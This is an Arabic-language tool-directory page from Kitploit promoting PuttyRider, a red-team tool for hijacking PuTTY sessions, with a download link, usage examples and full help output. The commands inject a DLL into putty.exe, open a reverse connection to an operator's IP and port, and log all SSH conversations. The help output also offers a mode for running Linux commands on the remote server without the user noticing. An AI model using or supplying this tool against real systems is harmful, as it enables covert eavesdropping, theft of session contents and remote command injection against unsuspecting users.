Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PuttyRider — اختطف جلسات Putty لاستراق محادثة وحقن أوامر Linux. | Kitploit
أدوات/GitHubGitHub/seastorm/puttyrider
الحركة الجانبيةاختبار الاختراقالقيادة والسيطرةالفريق الأحمرأداة الوصول عن بعد
GitHubseastorm/puttyrider

PuttyRider

اختطف جلسات Putty لاستراق محادثة وحقن أوامر Linux.

عرض المستودع
366735منذ 11 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PuttyRider

اختطاف جلسات Putty من أجل التنصت على المحادثة وحقن أوامر Linux.

تنزيل

PuttyRider-bin.zip

وثائق

  • عرض Defcamp 2014 - pdf
  • عرض Defcamp 2014 - فيديو

أمثلة

سرد عمليات Putty الموجودة وحالتها (محقونة / غير محقونة)

root@kitploit:~
PuttyRider.exe -l

حقن DLL في أول putty.exe تم العثور عليه وبدء اتصال عكسي من DLL إلى عنوان IP الخاص بي:المنفذ، ثم الخروج من PuttyRider.exe.

root@kitploit:~
PuttyRider.exe -p 0 -r 192.168.0.55:8080

التشغيل في الخلفية وانتظار عمليات Putty جديدة. الحقن في أي putty.exe جديد وكتابة جميع المحادثات في ملفات محلية.

root@kitploit:~
PuttyRider.exe -w -f

إخراج PuttyRider.dll من جميع عمليات Putty التي تم حقنها فيها بالفعل. (لا تنس إيقاف PuttyRider.exe إذا كان يعمل في وضع -w، وإلا فسيتم حقنها مرة أخرى.)

root@kitploit:~
PuttyRider.exe -x

الاستخدام

root@kitploit:~
أوضاع التشغيل:
	-l		سرد عمليات Putty الجارية واتصالاتها
	-w		الحقن في جميع جلسات Putty الموجودة وانتظار جلسات جديدة
			للحقن فيها أيضًا
	-p PID	الحقن فقط في جلسة Putty الموجودة والمعرفة بواسطة PID.
			إذا كان PID==0، فالحقن في أول Putty يتم العثور عليه
	-x		التنظيف. إزالة DLL من جميع حالات Putty الجارية
	-d		وضع التصحيح. يعمل فقط مع وضع -p
	-c CMD	تنفيذ أمر Linux تلقائيًا بعد الحقن الناجح
			سيقوم PuttyRider بإزالة المسافات الزائدة وحرف '&' من CMD
			سيقوم PuttyRider بإضافة: " 1>/dev/null 2>/dev/null &" إلى CMD
	-h		طباعة هذه المساعدة

أوضاع الإخراج:
	-f			كتابة جميع محادثات Putty إلى ملف في الدليل المحلي.
				سيكون اسم الملف برقم PID الخاص بـ putty.exe الحالي مضافًا إليه
	-r IP:PORT	بدء اتصال عكسي إلى الجهاز المحدد و
				بدء جلسة تفاعلية.

الأوامر التفاعلية (بعد تلقي اتصال عكسي):
	!status		معرفة ما إذا كانت نافذة Putty متصلة بإدخال المستخدم
	!discon		فصل نافذة Putty الرئيسية حتى لا تعرض أي شيء
				هذا مفيد لإرسال الأوامر دون أن يلاحظ المستخدم
	!recon		إعادة توصيل نافذة Putty إلى وضع التشغيل العادي
	CMD			أوامر شل Linux
	!exit		إنهاء هذا الاتصال
	!help		عرض المساعدة لاتصال العميل

الترجمة

استخدم موجه أوامر Visual Studio:

root@kitploit:~
nmake main dll

شكر وتقدير

شكرًا لـ Brett Moore من Insomnia Security على إثباته لمفهوم PuttyHijack

تنزيل الأداة